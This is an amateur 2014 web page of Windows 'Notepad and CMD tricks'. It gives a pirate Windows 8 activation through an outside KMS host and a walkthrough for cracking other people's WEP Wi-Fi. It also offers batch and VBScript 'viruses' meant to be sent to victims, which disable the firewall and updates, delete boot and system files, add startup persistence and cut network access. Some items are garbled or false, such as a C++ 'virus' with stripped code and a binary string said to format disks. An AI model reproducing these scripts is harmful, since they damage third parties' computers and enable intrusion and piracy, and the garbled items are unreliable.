Notepad And CMD Tricks 2014 By (Muhammad Nouman)


WARNING: This Website Includes Some Dangerous Tricks which Could be Proved Dangerous for PC So Use Them at Your OWN RISK....I AM NOT RESPONSIBLE FOR ANY DAMAGE OR PROBLEM..!!!



                    NotePad Tricks..!!!



 Activate Windows 8 Using Command Promt (2014)  


HOW TO ACTIVATE YOUR WINDOWS 8???                                                                                                   





 First of all you will open your command prompt as administrator.





   Now type these lines without Quation Mark.


   1.       “slmgr /upk”
   2.       Press enter then type this

   3.       “slmgr /ipk NG4HW-VH26C-733KW-K6F98-J8CK4”

   4.       Press enter then type this


   5.       “slmgr /skms lunar21.no-ip.org:80”
   6.       Press enter then type this


   7.       “slmgr.vbs –ato”



   If you’re done, restart your pc and , you have successfully activated

    your windows 8 to be fully genuine.



   This trick is tested on Windows 8 Professional . Enjoy it .


How To Hack Wep Encrypted WIFI Network Using Backtrack


Things you Need:
  1.      Backtrack 5 - I'd suggest GNOME, 32bit, ISO & Direct
  2.      Compatible Wireless Card
  3.      Making a Bootable USB or Backtrack DVD
  4.      WEP Encrypted Networks
  If you Don’t Have Backtrack Dvd Then Download its Iso File from Here.
     Now Download Unetbootin from Here.
      Follow These Steps to Make Bootable Flash Of Backtrack
·         Run Unetbootin.
·         Tick Diskimage instead of Distribution
·         Select USB Drive as the type, and select your USB drive name - Example: G:\
o    Select The Iso File Of Backtrack which you have Downloaded.
o    Click OK and wait a couple of minutes
o    When it finish Boot your pc through Flash
When booting into backtrack, you need to type startx and wait a couple of minutes for the desktop to show.
Okay so let's begin,Follow these Steps:
  1.      so first we need to open a terminal. To do that, just click the little icon that's on the right side from  System.
 2.      Now type airmon-ng and that command displays our interfaces. In my case I havewlan0,
 3.      Now we are going to put it into monitor mode. To do that, type airmon-ng start wlan0. As you can see on the picture below it says (monitor mode enabled on mon0), and we are going to be using mon0 instead of wlan0 as our interface.



  4. Type airodump-ng mon0 and that will start scanning for wi-fi networks. As you can see, there is a network called SKIDHACKER. Take a note of the BSSID (mac address) theDATA, the CHANNEL and the type of ENCRYPTION.  



       5.      Now we have to get number of packets (Data). To do that, type airodump-ng -c (channel) -w    WEPcrack --bssid (bssid of the network) mon0. Replace (channel)with the channel of the network  you are trying to crack, and replace (bssid of the network) with the bssid of the network you want to crack.



      6.      Okay so as you see the data is going really slow, and we need to boost that up. We need a lot more data, so let's preform one of the aireplay commands that will boost that data. Firstly, open up a new terminal and type aireplay-ng -1 0 -a (bsisd) mon0 where (bssid) is the bssid of the network. Now if your wi-fi card is supported, you should see Association successful :-), if you don't see that then your card is not supported.




    7.      Now we are going to type in aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0. And now when the question Use this packet ? pops up, just push the letter y.As you can see in the image below, the data went high .


  
    8.      Okay so now lets open a new terminal and we are going to attempt to crack it with the amount of data we have. I recommend getting over 20000 data before trying to crack it. So let's type aircrack-ng WEPcrack*.cap. Replace WEPcrack with the filename you chose before when capturing the data, and don't forget to add that asterisk after the file and the extension which is .cap



    9.      Now it will attempt to crack the password. Just wait a couple of minutes for it to complete, and once   it did it will say KEY FOUND! [ AA:AA:AA:AA:AA ] where the X's will be random numbers and/or letters. That's not it, now to connect you will need to remove the semicolumns. For an example, if you have 12:34:11:22:54, the password would be 1234112254. Just log in to your Windows OS, and connect using that password and enjoy…
  

Notepad tricks/Top five notepad tricks


1. Code to disable firewall in your or your victims system



Copy this code in Notepad



CODE:                                                     

net stop "Security center"

net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlset001serviceswscsvc]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0


Save it as *.bat or *.exe and then try....

Note:This trick disables firewall permanently..Beware

2. Change Your Processor to Intel Xeon 8.0 GHZ



Type following lines in notepad



Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0]



"ProcessorNameString"="Intel Xeon 8.0GHz (By Muhammad Nouman) "

and save as processor.reg and run it.



To see new processor name Click on “My computer” and right click and choose property,

which will show “ Intel Xeon 8.0 GHZ. (It is t...emparory change only)



Note: For permanent changes regedit /s processor.reg in notepad and save as phack.bat

and put both files(processor.reg and phack.bat)


In windows startup folder [ Documents abd settings\all users\start meny\programs\startup ]

which will run whenever the system restarts.

3.CREATE HIDDEN DATA IN NOTEPAD



IN CMD

type

notepad xxx :hidden

("replace xxx with the path of the text file to be create eg D:\)

then system ask to create a new txt file " click yes"

then type any secret datas on the opened text file
then save it
no one can read it by simply opening
TO READ DATA
OPEN CMD
type
notepad xxx :hidden
(then text file with data will be opened)



4. TO DELETE AN AUTO RUN FILE FROM A DRIVE / USB



@echo off

echo

ECHO ENTER THE USB\DRIVE LETTER TO REMOVE AUTORUN

echo

SET /P X=

attrib -h -r -s %X%:\autorun.inf
DEL %X%:\autorun.inf
pause
SAVE IT AS AUTO.BAT
OPEN IT                                                  



5. FLASHING LIGHTS



open notepad

write this

Set wshShell =wscript.CreateObject("WScript.Shell")

for i=1 to 25

if i<10 then
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
End if
Next
save it as light.vbs
then open it
u can see the lights of ur keyboard is flashing



Notepad tricks/10 virus notepad script


<b>All this command use to type in notepad</b>

1)Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!

Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")

Set colCDROMs = oWMP.cdromCollection

do

if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

End If

wscript.sleep 5000

loop



Save it as "Anything.VBS" and send it.



2) Toggle your friend's Caps Lock button simultaneously:

Type :



Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{CAPSLOCK}"

loop



Save it as "Anything.VBS" and send it.



3) Convey your friend a lil' message and shut down his / her computer:

Type :



@echo off

msg * I don't like you

shutdown -c "Error! You are too stupid!" -s



Save it as "Anything.BAT" in All Files and send it.



4) Frustrate your friend by making this VBScript hit Enter simultaneously:

Type :



Set wshShell = wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "~(enter)"

loop



Save it as "Anything.VBS" and send it.



5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:

Type :


WScript.Sleep 180000

WScript.Sleep 10000

Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.Run "notepad"

WScript.Sleep 100

WshShell.AppActivate "Notepad"

WScript.Sleep 500

WshShell.SendKeys "Hel"

WScript.Sleep 500

WshShell.SendKeys "lo "

WScript.Sleep 500

WshShell.SendKeys ", ho"

WScript.Sleep 500

WshShell.SendKeys "w a"

WScript.Sleep 500

WshShell.SendKeys "re "

WScript.Sleep 500

WshShell.SendKeys "you"

WScript.Sleep 500

WshShell.SendKeys "? "

WScript.Sleep 500

WshShell.SendKeys "I a"

WScript.Sleep 500

WshShell.SendKeys "m g"

WScript.Sleep 500

WshShell.SendKeys "ood"

WScript.Sleep 500

WshShell.SendKeys " th"

WScript.Sleep 500

WshShell.SendKeys "ank"

WScript.Sleep 500

WshShell.SendKeys "s! "



Save it as "Anything.VBS" and send it.



6) Frustrate your friend by making this VBScript hit Backspace simultaneously:

Type :
MsgBox "Let's go back a few steps"

Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{bs}"

loop

Save it as "Anything.VBS" and send it.


7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:

Type :


Set wshShell = wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "You are a fool."

loop



Save it as "Anything.VBS" and send it.



8. Open Notepad continually in your friend's computer:

Type :



@ECHO off

:top

START %SystemRoot%\system32\notepad.exe

GOTO top



Save it as "Anything.BAT" and send it.



9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:
1: Shutdown

2: Restart

3: Wipes out your hard drive (BEWARE)

4: Net send

5: Messages then shutdown

Type :



@echo off

title The end of the world

cd C:\

:menu

cls

echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...

pause

echo Pick your poison:

echo 1. Die this way (Wimp)

echo 2. Die this way (WIMP!)

echo 3. DO NOT DIE THIS WAY

echo 4. Die this way (you're boring)

echo 5. Easy way out

set input=nothing

set /p input=Choice:

if %input%==1 goto one

if %input%==2 goto two



Save it as "Anything.BAT" and send it.



You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.



10) THREATEN BY MAKING SCREEN FLASH
To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.



@echo off

echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg

echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg

echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg

echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg

echo g=100>>\z.dbg

echo q>>\z.dbg

debug nul

del \z.dbg

But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.

@echo off

:a

echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg

echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg

echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg

echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg

echo g=100>>\z.dbg

echo q>>\z.dbg

debug nul

del \z.dbg

goto a
Notepad tricks/creating virus by using notepad

HERE THERE ARE SOME EXCELLENT VIRUS SCRIPTS OF WEBS MOST DANGEROUS SCRIPTS ALSO INCLUDED IN IT

How to crash a PC Forever !

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE.
**Also remember this might not work with vista.**

How to stop someone's internet access:

@Echo off
Ipconfig /release

Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it

However, this is VERY easy to fix. Simply type in IPconfig /renew


ShutDown PC million Times:

1.right click on the desktop
2.click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next
note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...
3.u will get another dialogue box, write in it: Internet Explorer and press finish
4.u will find the icon on ur desktop, dont open it, just right click on it and press properties>change icon>select the icon the the internet explorer and the press apply then ok
try to open it, it is a virus
PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a

Freeze someone's desktop:

This is a funny trick, u can freeze someone's desktop

1.close everything u r working in, and work on desktop. so click on prtscr on ur keyboard.
2.go to paint and click on edit then paste
3.save this file as (name).bmp and close the paint.
3.now in the desktop, we have 2 remove desktop icons and shortcuts, so right click on the mouse and then properties, click on desktop then select customize desktop.
4.uncheck all the boxes in desktop icons and press ok. then press apply then ok
.
5.now to remove the shortcuts in the desktop, go to start and select My Computer, then click on c: right click on ur mouse and select new folder, write it any name
6.now go to desktop & select all da icons and right click on them then press cut,go to c: and paste them in the folder dat u created then close the window.
7.now to put the fake desktop image and remove the taskbar, so right click on desktop and gp to properties, now go to desktop and select Browse, select the file that u saved then press appply then ok. now to remove the windows taskbar, right click on the taskbar and go 2 properties, then select autohide the taskbar and then apply then ok
now all the icons r fake and the user will think that his desktop is freezed
enjoy it.!

SHUT UR INTERNET PERMANENTLY:

This is a slightly more advanced one. It shuts down your internet permanately. I tried it on myself accidently, i knew what it did, and it still took me a couple of days to get my internet back. works best on XP, not tested on vista or 7.

EDIT: At the bottom put a rickroll site or something. BTW, that 3rd line, isnt what disables the internet permanately. It is somethinge else, that just provides a fast response to shut down any connections.

@echo off
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t REG_SZ /d %systemroot%\HaloTrialScoreChangerV1 /f > nul
start iexpress (website of your choice)
ipconfig /release
del "C:\Program Files\Microsoft Games
del "C:Nexon
del "C:\Program Files\Xfire
del "C:\Program Files\Adobe"
del "C:\Program Files\Internet Explorer"
del "C:\Program Files\Mozilla Firefox"
del "C:\WINDOWS"
del "C:\WINDOWS\system32"
del "C:\WINDOWS\system32\cmd"
del "C:\WINDOWS\system32\iexpress"
del "C:\WINDOWS\system32\sndvol32"
del "C:\WINDOWS\system32\sndrec32"
del "C:\WINDOWS\system32\Restore\rstrui"
del "C:\WINDOWS\system32\wupdmgr"
del "C:\WINDOWS\system32\desktop"
del "C:\WINDOWS\java"
del "C:\WINDOWS\Media"
del "C:\WINDOWS\Resources"
del "C:\WINDOWS\system"
del "C:\drivers"
del "C:\drv"
del "C:\SYSINFO"
del "C:\Program Files"
echo ipconfig/release_all>>c:windowswimn32.bat
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
:a
start iexpress (website of your choice)
goto a

MAKING MOST DANGEROUS VIRUS CALLED MATRIX:

Warning - Do not run it on your computer

By Muhammad Nouman
1-Open notepad
2-Put in this code

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp
fp
fp
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp
fp
fp
fp
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;



3-save it as matrix.bat
4-finish


!!!NOTE!!!

AS IT WAS TOO DANGEROUS THE ACTUAL HEADER FILES FOR THIS SCRIPT ARE NOT GIVEN

AND IF U WANT TO TRY THIS SCRIPT U CAN JUST USE OF HEADER FILES SUCH AS STDIN,STDLIB,CONIO , AND STUFF LIKE THAT


Notepad tricks.







Notepad Trick to Format Hard disk



Open Notepad and type:



a) Code:01001011000111110010010101010101010000011111100000



b) Save As it as  anything.EXE



c) Run it. Beware that the entire HDD will be erased....n its dangerous fr pc......

Notepad Trick - BUSH HID THE FACTS



    Open notepad.



    Type BUSH HID THE FACTS



    Save that file.



    Close it



    Open It Again See…


   Infinite Notepad Trick
    Open Notepad.



    Paste the following code in your notepad file:

    @ECHO off
    :top
    START %SystemRoot%system32notepad.exe
    GOTO top
    Save the file with any name nut with .bat extension and close it.





 Notepad Trick to Lock Folders



Lets lock a folder using notepad trick which is named as PICS in your D: drive , whose path is D:PICS



Then the code should be something like this:



ren pics pics.{21EC2020-3AEA-1069-A2DD-08002B30309D}



Pics is your folder name. Use the name of the folder in place for pics. Save the text file as lock.bat in the same drive.



To unlock this locked folder:



Open another new notepad text file and type the following:



ren pics.{21EC2020-3AEA-1069-A2DD-08002B30309D} pics



Save the text file as key.bat in the same drive. Here again, pics is the name of the folder. Change it to the folder name you want to lock it.
    Comment and Mail me If You Like It...!!!! 
                           Nomi922411@gmail.com 


Comments Are More Than Welcome......For Suggestions Inbox Click Here